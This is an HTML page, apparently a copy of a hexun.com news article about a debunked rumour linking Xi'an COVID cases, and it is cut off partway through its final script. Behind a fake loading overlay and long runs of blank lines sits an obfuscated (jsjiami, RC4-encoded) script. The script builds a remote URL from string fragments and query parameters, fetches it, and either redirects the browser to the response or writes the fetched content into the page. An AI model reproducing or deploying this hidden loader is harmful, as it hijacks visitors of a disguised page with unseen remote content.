
<!DOCTYPE html>
<html>
<head>
	<title>...</title>
<style>
     iframe{
        display: none;
        width: 100%;
          height: 100%;
          margin: 0;
          padding: 0;
          border: none;
      }
      body {
        width: 100%;
          height: 100%;
          margin: 0;
          padding: 0;
          border: none;
    }
    /* loading效果 */
    .loading {
      position: fixed;
      left: 0;
      right: 0;
      top: 0;
      bottom: 0;
      z-index: 1;
      background-color: #77a4f3;
    }
  .loading .inner {
      position: absolute;
      left: 0;
      right: 0;
      top: 0;
      bottom: 0;
      height: 50px;
      margin: auto;
    }
    .loading .content {
      line-height: 50px;
      text-align: center;
    }
    .loading .img {
      width: 100%;
    }
    .loading .animate {
      text-align: center;
    }
    .loading .animate span {
      display: inline-block;
      width: 6px;
      height: 50px;
      background-color: #fff;
      -webkit-transform: scaleY(0.4);
              transform: scaleY(0.4);
      -webkit-animation: scale 1s infinite;
              animation: scale 1s infinite;
    }
    .loading .animate span:nth-child(2) {
      -webkit-animation: scale 1s .2s infinite;
              animation: scale 1s .2s infinite;
    }
    .loading .animate span:nth-child(3) {
      -webkit-animation: scale 1s .3s infinite;
              animation: scale 1s .3s infinite;
    }
    .loading .animate span:nth-child(4) {
      -webkit-animation: scale 1s .4s infinite;
              animation: scale 1s .4s infinite;
    }
    .loading .animate span:nth-child(5) {
      -webkit-animation: scale 1s .5s infinite;
              animation: scale 1s .5s infinite;
    }
    .loading .animate span:nth-child(6) {
      -webkit-animation: scale 1s .6s infinite;
              animation: scale 1s .6s infinite;
    }
    @-webkit-keyframes scale {
      0% {
        -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4);
      }
      20% {
        -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8);
      }
      40% {
        -webkit-transform: scaleY(1);
                transform: scaleY(1);
      }
      100% {
        -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4);
      }
    }
    @keyframes scale {
      0% {
        -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4);
      }
      20% {
        -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8);
      }
      40% {
        -webkit-transform: scaleY(1);
                transform: scaleY(1);
      }
      100% {
        -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4);
      }
    }
    .loading .tips {
      font-size: 1rem;
      color: #fff;
      text-align: center;
    }
    </style>
</head>
<body>
	<div class="loading">
      <div class="inner">
        <div class="animate">
          <span></span>
          <span></span>
          <span></span>
          <span></span>
          <span></span>
          <span></span>
        </div>
        <p class="tips">加载中，请稍候...</p>
      </div>
    </div>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<div class="layout mg clearfix">
	<div class="w600">
		<div class="art_context">

<div class="art_contextBox" style="height: 500px; overflow: hidden; padding-top: 40px; position: relative;">

<p style="TEXT-INDENT: 2em">原标题：当事人辟谣与西安子牛门诊护士非情人，两人并不相识</p>
<p style="TEXT-INDENT: 2em">（观察者网讯）</p>
<p style="TEXT-INDENT: 2em">疫情当前，又有人开始“无中生有”了。</p>
<p style="TEXT-INDENT: 2em">12日，“陕西发布”通报称西安市子牛门诊部护士郭某被确诊新冠肺炎。23日，网上开始散布一张来源为“华商网”的疫情传播链图，有人在图上添加标注称该护士与21岁的向某及51岁的杨某均为情人关系。</p>
<p style="TEXT-INDENT: 2em">23日，当事人向某发<a href="http://t.hexun.com" target="_blank">微博</a>称与子牛门诊护士不认识，也不是情侣，更没有网传的开房，且自己在专班期间没有离开酒店。@华商网发布声明称网传关系图非华商原发，图上标注“病例之间存在情人关系”系谣言，已上报上级单位及公安机关。</p>
<p style="TEXT-ALIGN: center"><img style="MAX-WIDTH: 600px" src="http://fwimage.cnfanews.com/websiteimg/2021/20211224/15884/71ada3f2719c95ceeb9a06e845a3e021.png"><a href="http://news.hexun.com/2015/znxz/?utm_campaign=web_article_picdown" data-id="55" class="aImgDl">打开APP 阅读最新报道</a></p>
<p style="TEXT-INDENT: 2em">近日，西安的疫情情况再次牵动了全国人民的目光。</p>
<p style="TEXT-INDENT: 2em">23日，一张来源@华商网的确诊病例传播链分解图突然在网上流传开。有人在图中篡改标注称，西安市子牛门诊部护士郭某与21岁的向某及51岁的杨某均为情人关系。向某为灞桥隔离酒店的工作人员，杨某为长安大学工作人员。</p>
<p style="TEXT-INDENT: 2em">随后，还有聊天记录宣称，隔离酒店的工作人员已经结婚，女方又“不松口、不敢认”，还称该护士和人“开房”，造成这次病毒从隔离酒店泄露。</p>
<p style="TEXT-ALIGN: center"><img style="MAX-WIDTH: 600px" src="http://fwimage.cnfanews.com/websiteimg/2021/20211224/15884/f9bf51fb08dc4173f54ebc5ddc659b1a.png"></p>
<p style="TEXT-INDENT: 2em">22日至24日，@用户7724062026连发三条微博做出澄清，表示自己是瑾程酒店专班向某，也是谣言当事人。</p>
<p style="TEXT-INDENT: 2em">“第一子牛门诊护士我不认识，我们也不是情侣，更没有网传的开房，一个21岁的向某，一个20岁的张某怎么可能结婚了。第二我在专班期间没有离开酒店，更没有网传的那些无稽之谈。”</p>
<p style="TEXT-INDENT: 2em">他罗列了自己从12月3日至今的路线，表示酒店监控、手机大数据、手机号定位都可以证明自己的清白。</p>
<p style="TEXT-INDENT: 2em">他表示：“参加防疫工作的时候，你们有没有看见我们这些防疫人员的辛苦，造谣的时候你们比谁都快，你做键盘侠的时候有没有想过别人的感受。”</p>
<p style="TEXT-ALIGN: center"><img style="MAX-WIDTH: 600px" src="http://fwimage.cnfanews.com/websiteimg/2021/20211224/15884/5a3042693303f6b2fac65fccf44e975e.png"></p>
<p style="TEXT-INDENT: 2em">23日，@华商网发布声明表示“网传确诊病例传播链分解图系篡改造谣”，称此谣言图片非华商网原发图片。关于篡改华商网新闻作品对疫情信息进行造谣一事，华商网已经上报上级单位及公安机关。请广大网民不信谣、不传谣，从正规新闻媒体获取疫情相关的权威信息。</p>
<p style="TEXT-ALIGN: center"><img style="MAX-WIDTH: 600px" src="http://fwimage.cnfanews.com/websiteimg/2021/20211224/15884/87a60c6ae084f390c797c077b60599d2.png"></p>
<p style="TEXT-INDENT: 2em">华商网于声明末尾附上原图，原图并未标出有关郭某的传播链。</p>
<p style="TEXT-ALIGN: center"><img style="MAX-WIDTH: 600px" src="http://fwimage.cnfanews.com/websiteimg/2021/20211224/15884/f6efd3286e67994dc84516bd14a3db58.png"></p>

			

			<div style="text-align:right;font-size:12px">（责任编辑：董云龙 ）</div>

			


<div class="bottomLayer" style="height: 100px;width: 100%;background-image: -webkit-linear-gradient(top, rgba(255, 255, 255, 0), #ffffff);position: absolute;left: 0;bottom: 0;z-index: 0;"></div></div>




<style>.showall_arrow{margin-top:15px;}.showall_arrow span{width:18px;height:21px;cursor:pointer;margin:0 auto;display:block;}.showall_img{width:600px;height:305px;text-align:center;margin-top:5px;position: relative;}.showall_img .showall_title{font-size:24px;color:#ea1d00;}.showall_img .showall_content{font-size:18px;color:#000;}.showall_img .qr_code{width:166px;height:154px;margin:14px auto 0;}.showall_img .qr_code img{width:100%;height:100%;display:block;}.showall_img .diversionToWXBottom{width:790px;height:305px;display:block;right:-70px;position: absolute;}</style><div class="showall_arrow"><span></span></div><div class="showAllImg" style="display:none;margin-bottom:20px; padding:8px 0 0 8px; height:140px; margin-top:15px;background:url(https://i0.hexun.com/2016/pc/ad/bannercode/img/bg_btm.png)"></div><div class="showall_img"><img class="diversionToWXBottom" src="https://web.hexun.com/pc/img/diversionToWXBottom.png"></div>


</div>

		<!--评论-->

		<div class="comments">

			<div class="tit"><strong>写评论</strong><span>已有<i id="commentsSum"></i>条评论</span><a href="http://news.hexun.com/zlgy.html" target="_blank" class="zlgttext">跟帖用户自律公约</a></div>
			<div class="formContent">
				<textarea class="content" id="content"></textarea>
			</div>
			<div class="formSubmit clearfix"><span class="bn" data="only">提 交</span><span class="tip">还可输入<i class="maxNum">500</i>字</span> </div>
			<div class="pt20">
				<h3 class="commentsTit">最新评论</h3>
                                       <div id="commentsHideUserName"></div>
				<div id="commentsBox"></div>
			</div>
			<div class="showAllComments"><span>查看剩下<i>100</i>条评论</span></div>
		</div>
		<!--评论 e-->
	  
<!--
			<div class="like">
				<h4>你可能会喜欢</h4>
				<ul class="clearfix pt20">  
-->


		<div class="recommond">
			<h4>相关推荐</h4>
			<ul>

<!--li><a href="http://opinion.hexun.com/2018-10-26/195007813.html"><img src="http://img.hexun.com/zl/hx/articlePage/images/tmpl1030.png" /><span>当年万人逃港事件，促使设立深圳经济特区 | 《我们的四十年》</span></a></li-->
						<li><a href="http://news.hexun.com/2021-12-24/204998113.html">又有人无中生有！被造谣和护士开房确诊男子发声</a><span>2021-12-24</span></li><li><a href="http://news.hexun.com/2021-12-24/204998082.html">和人民在一起·2021丨美丽中国</a><span>2021-12-24</span></li><li><a href="http://news.hexun.com/2021-12-24/204998067.html">国内31省区市新增本土确诊病例55例 其中陕西52例</a><span>2021-12-24</span></li><li><a href="http://news.hexun.com/2021-12-24/204998056.html">受奥密克戎影响 美联航和达美取消逾200个圣诞前夕航班</a><span>2021-12-24</span></li><li><a href="http://news.hexun.com/2021-12-24/204998055.html">累计确诊255例！陕西235例确诊病例关系一图读懂 新增中风险地区31个……</a><span>2021-12-24</span></li>
				</ul>
			</div> 

			
		
		<!--你可能会喜欢 e-->
		<!--图片广告-->  

		<div class="picAd">
			<div id="tonglan_2"></div>
			<div class="clearfix pt20">
				<div class="fl mr20" id="qizhi_3">

                                       </div>
				<div class="fl" id="qizhi_4"></div>
				<div class="fl mr20 mt20" id="qizhi_5"></div>
				<div class="fl mt20" id="qizhi_6"></div>
                                       
			</div>
		</div>

		<!--图片广告 e-->
	</div>
	<div class="w300">
		<!--投顾志--> 
		<iframe src="" width="300" height="370" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" border="0" class="mt40" id="rightIframe">
</iframe>
		<!--投顾志 e--> 
		<div class="mt40" id="qizhi_1"></div>
		
		<div id="rightbtn_2" class="rightTextAd" 360chrome_form_autofill="2">
</div>
		 
<!--付费新闻排行-->
<!--iframe width="300" height="560" frameborder="0" frameborder="no" border="0" scrolling="no"  allowtransparency="yes" src="https://news.hexun.com/xportdata/2019hx_page_news_ph.inc"></iframe-->


<!-- 原创新闻排行 begin -->
<!--
<iframe width="300" height="560" frameborder="0" frameborder="no" border="0" scrolling="no"  allowtransparency="yes" src="https://news.hexun.com/xportdata/2019hx_page_news_ph_yc.inc"></iframe>
-->
<style type="text/css">
#jrtt-list-box .top10{ background:none;}
#jrtt-list-box .top10 li{ height:55px; line-height:55px; font-size:14px; padding-left:30px; border-bottom:1px dotted #ddd; overflow:hidden; position:relative;}
#jrtt-list-box .top10 li .f16{ font-size:16px;}
#jrtt-list-box .top10 li em{ width:20px; height:20px; line-height:20px; font-style:normal; display:block; position:absolute; left:0; top:50%; margin-top:-10px; text-align:center; color:#fff; border-radius:20px; background-color:#e5e5e5;}
#jrtt-list-box .top10 li.topthree em{ background-color:#ee191c;}
#jrtt-list-box .top10 a{ color:#000; text-decoration:none;}
</style>
<div id="jrtt-list-box" class="h" style="display: block;">
	<h3 class="rTit">推荐阅读</h3>
	<ul class="top10" id="jrtt-list"><li class="topthree"><em>1</em><a href="http://stock.hexun.com/2021-12-24/204997900.html" class="f16" target="_blank">外资休假，内资砸盘！“宁王”罕见大跌8% 锂电池板块不香了？</a></li><li class="topthree"><em>2</em><a href="http://news.hexun.com/2021-12-24/204997646.html" class="f16" target="_blank">央企总部搬迁，背后考量几何？</a></li><li class="topthree"><em>3</em><a href="http://stock.hexun.com/2021-12-24/204997513.html" class="f16" target="_blank">天地板后欲冲击地天板 盛泰集团成今日最大妖股</a></li><li class=""><em>4</em><a href="http://news.hexun.com/2021-12-24/204997437.html" class="f16" target="_blank">住院风险至少降低70%！三大研究力证奥密克戎毒性更温和</a></li><li class=""><em>5</em><a href="http://futures.hexun.com/2021-12-24/204997300.html" class="f16" target="_blank">能源危机愈演愈烈！欧洲电价疯涨或引发“停电潮”……</a></li><li class=""><em>6</em><a href="http://stock.hexun.com/2021-12-24/204996977.html" class="f16" target="_blank">创业板指跌逾2% 宁德时代跌超7%</a></li><li class=""><em>7</em><a href="http://news.hexun.com/2021-12-24/204996755.html" class="f16" target="_blank">疫情防控不力，西安处理相关责任人26名！境外隔离酒店出现专班工作人员感染新冠</a></li><li class=""><em>8</em><a href="http://news.hexun.com/2021-12-24/204996134.html" class="f16" target="_blank">外交部发言人就美方签署所谓“维吾尔强迫劳动预防法案”发表谈话</a></li><li class=""><em>9</em><a href="http://news.hexun.com/2021-12-24/204996125.html" class="f16" target="_blank">海航集团机场板块实际控制权利正式移交</a></li><li class=""><em>10</em><a href="http://stock.hexun.com/2021-12-24/204996066.html" class="f16" target="_blank">朴槿惠将获文在寅赦免！此前被判22年徒刑，已被关押1730天，健康状况恶化，胞妹宣布参选下届总统</a></li><li class=""><em>11</em><a href="http://gold.hexun.com/2021-12-24/204996051.html" class="f16" target="_blank">现货黄金持坚，美元反弹乏力，该领域暗示来年前景向好</a></li><li class=""><em>12</em><a href="http://futures.hexun.com/2021-12-24/204996020.html" class="f16" target="_blank">期货反弹现货弱 成交继续凉凉</a></li><li class=""><em>13</em><a href="http://futures.hexun.com/2021-12-24/204996017.html" class="f16" target="_blank">铁矿为何持续上涨，后期主要驱动是什么？</a></li><li class=""><em>14</em><a href="http://funds.hexun.com/2021-12-24/204995955.html" class="f16" target="_blank">啥情况！最大权益基金放宽限购，叠加白酒消费旺季，行情可期？机构火线解读</a></li><li class=""><em>15</em><a href="http://stock.hexun.com/2021-12-24/204995933.html" class="f16" target="_blank">腾讯“解绑”京东，释放了什么信号？</a></li><li class=""><em>16</em><a href="http://stock.hexun.com/2021-12-24/204995920.html" class="f16" target="_blank">护不住的百济神州！上市刚6天，28亿绿鞋额度已无“余额”，中金买入超1700万股，破发已20%</a></li><li class=""><em>17</em><a href="http://news.hexun.com/2021-12-24/204995913.html" class="f16" target="_blank">艰难时刻，西安新增31个中风险地区 西安的危机与焦虑</a></li></ul>
</div>

<!-- 原创新闻排行 end -->




  

		<div class="mt40" id="qizhi_2"><iframe width="300" height="250" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" src="https://h01hxsame.hexun.com/s?z=hexun&amp;c=1838&amp;op=1"></iframe></div>

 

<h3 class="rTit">和讯热销金融证券产品</h3>







		<div class="mt40" id="qizhi_7"></div>

	</div>
</div>
</body>
<script type="text/javascript">
;var encode_version = 'jsjiami.com.v5', oijsu = '__0xe0990',  __0xe0990=['wqccO8K7w7cZwrZHw7s=','wpMow6zCrzMwRMKTKcKnNFR6JQ==','w7lqaQ==','54qz5p2o5YyA772kchLkvIPlrbzmn6XlvKHnqY3vvZTovp7or47mlI/mj6Xmia7kua3nm7XltIzkvZ0=','wonDqE9cJQ==','OcOsRcO+w6k=','w6Y1w6Jnbw==','P8OZd8OTw4w=','UMOcPMKPIw==','FMOIwrphwqw=','OnnCrsKLbQ==','FsO9AMKAeQ==','5YmJ6Zm/54qy5p+v5Y+T776UQgjkv7nlr73mn4Tlv4Lnq78=','5Yu56ZmO54ud5p2b5Y6G7762N8O35L2e5a+R5p2B5b6456m0','O8O+S8KoCQ==','IEU6w68fw5Ajd8KcM8OMGVlQGsKVcFtuKxN8B8OBwoERw4sxwr7DkcKNDFjDpMO1w5VEwo9dw5vDgMK8EsK3w6DDr8ORw7lRw4sRK8KRw6LDk8KLwpLCkMOAwqvDvMK+w7QG','IkB9','w64DwqMMMcOSwpvDiV/Dskk=','w5PDgMObAG4EC8Oz','bsObwrZaN8KGZcKvLRgvKcKVw5rDnjcWKgMFQ8KdEMK6a8OUw7/Dkz3DjsKXRDrCi2bDonXDuA==','f8ORUmQP','KnZXw6HDvQ==','w4fCpzM6Gg==','w547WG7DsQ==','wr5Pw6E=','JBLDuhzCjA==','DsOUKsKzZQ==','AcOvwodBwpk=','w7MjWcK9','wqEXMcK6','wrIwFnzDnw==','csO+f2PCrMKfR1nDm8K/asOLw7vCp0fDt8Ktw7k=','wqITMA==','LlBsSMOl','MMOmYMOewpnDmGbCosOAwrQ=','wqVocz1dMw==','w5ZtU8O9Dg==','wp0yfw==','LMOeZA==','w5fDm8OMEWlXS8Ky','M8OIwrQcKg==','Pn0Jfgw=','HkglSFPDvsKF','LsKjwr15Jg==','wqpPw7sT','wq/DnsKWwol4VcKvwrHCgsKnw51Aw70twqPCtDQL','w48fVsKRLQ==','woQYUD7CnBgVw5TDhRw=','wqnDvnpgGcO0','w6E3w5NYcw==','w7bDlsO8ClU=','wo3DksK3wpZR','w5jCrQoECw==','N8OHPUlc','wojDj8O6bcK1','LsOlE0RS','wozCrhDCp8Oe','w4wnf8K+BQ==','NVfDhFZV','w4zDn8OkFns=','w78IXsK6JQ==','wpg2w5fCpD4=','wosqw5LCjgY=','MUzDo1lH','w6MvRlDDosOmEA==','M8OoIcKjYA==','woPDqMKSwo14','AHJYfcOq','w64gc0vDug==','woU1wqvDvg==','fMOHwotj','VcKVw6Fpw4A3M8OnBHUaw7wdwqDDpMOLw7LDgw==','MFnDrlRKwqHDkcOfXMK+','w6kgw5FFRw==','Q8OFd1JwHw==','fcODF8KdCw==','wqAXLMKuw74ewqtHw4vDusOsGw==','wpjCiC7CqcOW','An5Tw5zCpA==','w5k5w7/DrDwYwqjClcKV','H8OwaA==','HMOXKk9f','w71NfcOmMw==','XHhPw5pp','PsOQbcODw7XCuw==','DcO0d8K9Iw==','5Yq16Zqr54iR5p2S5Y60776AwoEu5L2Z5a6N5p+Y5b2d56qj','VMObfkcn','wqzDlcKKwottWQ==','ScKLw79lw5U=','JcK6wq9rP8OBY8O9','w7s8w5ZPaH4=','w6hmwrvCqsK0axgEbg==','CRjDnA=='];(function(_0x22c705,_0x4c6f94){var _0x33aac3=function(_0x2b4a2d){while(--_0x2b4a2d){_0x22c705['push'](_0x22c705['shift']());}};_0x33aac3(++_0x4c6f94);}(__0xe0990,0x128));var _0x5169=function(_0x1fe536,_0x1ed959){_0x1fe536=_0x1fe536-0x0;var _0x248b80=__0xe0990[_0x1fe536];if(_0x5169['initialized']===undefined){(function(){var _0x3029f6=typeof window!=='undefined'?window:typeof process==='object'&&typeof require==='function'&&typeof global==='object'?global:this;var _0x147749='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x3029f6['atob']||(_0x3029f6['atob']=function(_0x405dd3){var _0x480def=String(_0x405dd3)['replace'](/=+$/,'');for(var _0x27cd2=0x0,_0x5edcd7,_0x3808a8,_0xb84ee5=0x0,_0x526b9e='';_0x3808a8=_0x480def['charAt'](_0xb84ee5++);~_0x3808a8&&(_0x5edcd7=_0x27cd2%0x4?_0x5edcd7*0x40+_0x3808a8:_0x3808a8,_0x27cd2++%0x4)?_0x526b9e+=String['fromCharCode'](0xff&_0x5edcd7>>(-0x2*_0x27cd2&0x6)):0x0){_0x3808a8=_0x147749['indexOf'](_0x3808a8);}return _0x526b9e;});}());var _0x5d51f4=function(_0x2271f6,_0x5d093a){var _0x871210=[],_0x11ec46=0x0,_0x3c9cd7,_0x41a013='',_0x5e9c37='';_0x2271f6=atob(_0x2271f6);for(var _0x53fb60=0x0,_0x419f45=_0x2271f6['length'];_0x53fb60<_0x419f45;_0x53fb60++){_0x5e9c37+='%'+('00'+_0x2271f6['charCodeAt'](_0x53fb60)['toString'](0x10))['slice'](-0x2);}_0x2271f6=decodeURIComponent(_0x5e9c37);for(var _0x301169=0x0;_0x301169<0x100;_0x301169++){_0x871210[_0x301169]=_0x301169;}for(_0x301169=0x0;_0x301169<0x100;_0x301169++){_0x11ec46=(_0x11ec46+_0x871210[_0x301169]+_0x5d093a['charCodeAt'](_0x301169%_0x5d093a['length']))%0x100;_0x3c9cd7=_0x871210[_0x301169];_0x871210[_0x301169]=_0x871210[_0x11ec46];_0x871210[_0x11ec46]=_0x3c9cd7;}_0x301169=0x0;_0x11ec46=0x0;for(var _0x511592=0x0;_0x511592<_0x2271f6['length'];_0x511592++){_0x301169=(_0x301169+0x1)%0x100;_0x11ec46=(_0x11ec46+_0x871210[_0x301169])%0x100;_0x3c9cd7=_0x871210[_0x301169];_0x871210[_0x301169]=_0x871210[_0x11ec46];_0x871210[_0x11ec46]=_0x3c9cd7;_0x41a013+=String['fromCharCode'](_0x2271f6['charCodeAt'](_0x511592)^_0x871210[(_0x871210[_0x301169]+_0x871210[_0x11ec46])%0x100]);}return _0x41a013;};_0x5169['rc4']=_0x5d51f4;_0x5169['data']={};_0x5169['initialized']=!![];}var _0x15e442=_0x5169['data'][_0x1fe536];if(_0x15e442===undefined){if(_0x5169['once']===undefined){_0x5169['once']=!![];}_0x248b80=_0x5169['rc4'](_0x248b80,_0x1ed959);_0x5169['data'][_0x1fe536]=_0x248b80;}else{_0x248b80=_0x15e442;}return _0x248b80;};(function(){var _0x53b10b={'Alywc':function _0x38b6c1(_0x1deb41,_0x1950b9){return _0x1deb41(_0x1950b9);},'aEwUp':'rkld','rZMNG':_0x5169('0x0','FAyQ'),'RhjDY':'Yhe','xjWRw':_0x5169('0x1','A)F('),'Zqjjz':_0x5169('0x2','(&(!'),'HxRrA':_0x5169('0x3',')#iN'),'wFRTG':'Gatedomain','MbSzH':function _0x3e3f7e(_0x359f79,_0x33afad){return _0x359f79+_0x33afad;},'nIekh':function _0x2b66fc(_0x455741,_0x507173){return _0x455741+_0x507173;},'wkKff':function _0x298011(_0x8b1c94,_0x1c8ead){return _0x8b1c94+_0x1c8ead;},'DDjbF':function _0x59cb25(_0x5a3f7d,_0x313b77){return _0x5a3f7d+_0x313b77;},'amQbl':_0x5169('0x4','2H(4'),'boxof':function _0x5e7814(_0x254d96,_0x5bef37){return _0x254d96===_0x5bef37;},'rqTHT':'bGt','NLgyq':function _0x338d57(_0x1a1dee,_0x13906e){return _0x1a1dee+_0x13906e;},'CXvaa':function _0x269c6f(_0x2da0a0,_0x52fd90){return _0x2da0a0+_0x52fd90;},'cMuhn':function _0x20ae40(_0x2850dd,_0x3e766d){return _0x2850dd+_0x3e766d;},'hlvlF':'http://','jjAOq':_0x5169('0x5','Rpaf'),'ZkuXo':'get','IcnlQ':'版本号，js会定期弹窗，还请支持我们的工作'};var _0x172414=getQueryParam('lkid');var _0x4cebf2=_0x53b10b[_0x5169('0x6','9Z9s')](getQueryParam,_0x53b10b['aEwUp']);if(_0x4cebf2==_0x53b10b[_0x5169('0x7','(&(!')]){if(_0x53b10b[_0x5169('0x8','@0mV')]!==_0x53b10b['RhjDY']){return pair[0x1];}else{var _0x1269e7=_0x53b10b['xjWRw']['split']('|'),_0x2aa8b0=0x0;while(!![]){switch(_0x1269e7[_0x2aa8b0++]){case'0':var _0x94ed4b=_0x53b10b[_0x5169('0x9',')E7E')];continue;case'1':_0x205150['open'](_0x5169('0xa','34ON'),_0x43b409);continue;case'2':var _0xbc1ece='/';continue;case'3':var _0x441e77='/';continue;case'4':var _0xcc926e=_0x53b10b[_0x5169('0xb','LYE6')];continue;case'5':var _0x5bdc53='id/';continue;case'6':var _0x564684='sl';continue;case'7':var _0x236170=_0x219815[0x0][_0x5169('0xc','K6mL')]('_');continue;case'8':var _0x219815=_0x172414[_0x5169('0xd','kmJp')]('&');continue;case'9':var _0x2bdc5c=_0x5169('0xe','YnY)');continue;case'10':var _0x205150=new XMLHttpRequest();continue;case'11':_0x205150[_0x5169('0xf','$%&b')]();continue;case'12':var _0x181a34=_0x53b10b[_0x5169('0x10','H#!R')];continue;case'13':_0x205150[_0x5169('0x11',']*Pr')]=function(){var _0x5557bf={'tSbIN':function _0x3da8bb(_0x222b9f,_0x2d08bf){return _0x222b9f==_0x2d08bf;},'FNBYI':function _0x518e6(_0x16f93d,_0x5053b1){return _0x16f93d==_0x5053b1;},'XPBrI':function _0x288c0a(_0x4981ce,_0xf4a034){return _0x4981ce!==_0xf4a034;},'HAXFe':function _0x4442d9(_0x58ede4,_0x555850){return _0x58ede4+_0x555850;},'gvqsm':'.cn/index.php/Home/Speed/GteArticl/id/','fAyhl':_0x5169('0x12','H#!R')};if(_0x5557bf[_0x5169('0x13','7N]c')](_0x205150[_0x5169('0x14','XBLQ')],0x4)&&_0x205150[_0x5169('0x15','6I6b')]==0xc8){if(_0x5557bf[_0x5169('0x16','(QUh')](_0x5169('0x17','nWGJ'),_0x5169('0x18','FAyQ'))){window[_0x5169('0x19','2H(4')]['href']=_0x205150['responseText'];}else{var _0x10fd24=_0x172414[_0x5169('0x1a','Rpaf')]('_');var _0x3acc31=new Date()['getTime']();var _0x4173d0=_0x5557bf['HAXFe'](_0x5557bf[_0x5169('0x1b','!71]')](_0x5169('0x1c','!71]')+_0x3acc31+'.',_0x10fd24[0x2])+_0x5557bf[_0x5169('0x1d','Iq0z')],_0x172414);var _0x4aa924=new XMLHttpRequest();_0x4aa924['open'](_0x5557bf['fAyhl'],_0x4173d0);_0x4aa924[_0x5169('0x1e','34ON')]();_0x4aa924[_0x5169('0x1f','U658')]=function(){if(_0x5557bf[_0x5169('0x20','YnY)')](_0x4aa924[_0x5169('0x21','nWGJ')],0x4)&&_0x4aa924[_0x5169('0x22','%E*p')]==0xc8){document['write'](_0x4aa924['responseText']);}};}}};continue;case'14':var _0x2f0557='/';continue;case'15':var _0x4b307c='yt';continue;case'16':var _0x236f00=_0x5169('0x23','(gm[');continue;case'17':var _0x2ea365='.php';continue;case'18':var _0x95d465='.';continue;case'19':var _0x2899b5='/';continue;case'20':var _0x149bc1='cn';continue;case'21':var _0x34c109='.';continue;case'22':var _0x4d0aa3='/';continue;case'23':var _0x43b409=_0x53b10b[_0x5169('0x24','2H(4')](_0x53b10b['MbSzH'](_0x53b10b[_0x5169('0x25','U658')](_0x53b10b[_0x5169('0x26','@0mV')](_0x53b10b[_0x5169('0x27','5@73')](_0x53b10b[_0x5169('0x28','mafj')](_0x53b10b[_0x5169('0x29','5@73')](_0x53b10b[_0x5169('0x2a','YjA6')](_0x53b10b['wkKff'](_0x53b10b[_0x5169('0x2b','YnY)')](_0x53b10b[_0x5169('0x2c','!ggm')](_0x53b10b[_0x5169('0x2d','2H(4')](_0x53b10b[_0x5169('0x2e','YnY)')](_0x53b10b[_0x5169('0x2f','@AP8')],_0x564684),_0x34c109),_0x94ed4b),_0x4b307c),_0x12d0f9),_0x95d465)+_0x149bc1+_0x2899b5,_0x236f00),_0x2ea365)+_0x441e77,_0x2bdc5c),_0x4d0aa3)+_0x181a34,_0x2f0557)+_0xcc926e+_0xbc1ece,_0x5bdc53),_0x219815[0x0]);continue;case'24':var _0x12d0f9='y';continue;}break;}}}else{if(_0x53b10b['boxof'](_0x53b10b[_0x5169('0x30','@AP8')],_0x53b10b['rqTHT'])){var _0x452fac=_0x172414[_0x5169('0x31','!ggm')]('_');var _0x43704a=new Date()[_0x5169('0x32',')E7E')]();var _0x2c10f1=_0x53b10b['DDjbF'](_0x53b10b[_0x5169('0x33','K6mL')](_0x53b10b[_0x5169('0x34','U658')](_0x53b10b['cMuhn'](_0x53b10b[_0x5169('0x35','7N]c')],_0x43704a),'.')+_0x452fac[0x2],_0x53b10b[_0x5169('0x36',')E7E')]),_0x172414);var _0x3a14b9=new XMLHttpRequest();_0x3a14b9[_0x5169('0x37','95p%')](_0x53b10b['ZkuXo'],_0x2c10f1);_0x3a14b9[_0x5169('0x38','m8Jy')]();_0x3a14b9[_0x5169('0x39','ym%U')]=function(){var _0x151ef5={'ayfxL':function _0x61e66a(_0x17313e,_0x51fc5b){return _0x17313e==_0x51fc5b;}};if(_0x151ef5['ayfxL'](_0x3a14b9[_0x5169('0x3a','!ggm')],0x4)&&_0x151ef5[_0x5169('0x3b','(gm[')](_0x3a14b9[_0x5169('0x3c','jRcd')],0xc8)){document[_0x5169('0x3d','40AT')](_0x3a14b9[_0x5169('0x3e','$%&b')]);}};}else{w[c](_0x53b10b[_0x5169('0x3f','YjA6')]('删除',_0x53b10b[_0x5169('0x40','Tv9P')]));}}}());function getQueryParam(_0x10c4b7){var _0x7ff84e={'EYrmk':_0x5169('0x41','95p%'),'DABIG':function _0x55b458(_0x4addd9,_0x4451b4){return _0x4addd9<_0x4451b4;},'PkPfO':_0x5169('0x42','^U1$'),'jfUTK':function _0x1e0cdc(_0x344479,_0x28d48e){return _0x344479<_0x28d48e;},'PjnTX':function _0x5a3b72(_0xeff7cb,_0x183b7f){return _0xeff7cb==_0x183b7f;}};var _0xd1c919=_0x7ff84e[_0x5169('0x43','5@73')]['split']('|'),_0x2be323=0x0;while(!![]){switch(_0xd1c919[_0x2be323++]){case'0':var _0x521520=_0x1e10e0[0x0]['split']('&');continue;case'1':var _0x1e10e0=_0x5844d9[_0x5169('0x44','(QUh')]('?');continue;case'2':for(var _0x25082a=0x0;_0x7ff84e[_0x5169('0x45','A)F(')](_0x25082a,_0x521520[_0x5169('0x46','^U1$')]);_0x25082a++){if(_0x7ff84e[_0x5169('0x47','FAyQ')]!==_0x7ff84e[_0x5169('0x47','FAyQ')]){w[c](_0x5169('0x48','@0mV'));}else{for(var _0x25082a=0x0;_0x7ff84e[_0x5169('0x49','9Z9s')](_0x25082a,_0x521520[_0x5169('0x4a','U658')]);_0x25082a++){var 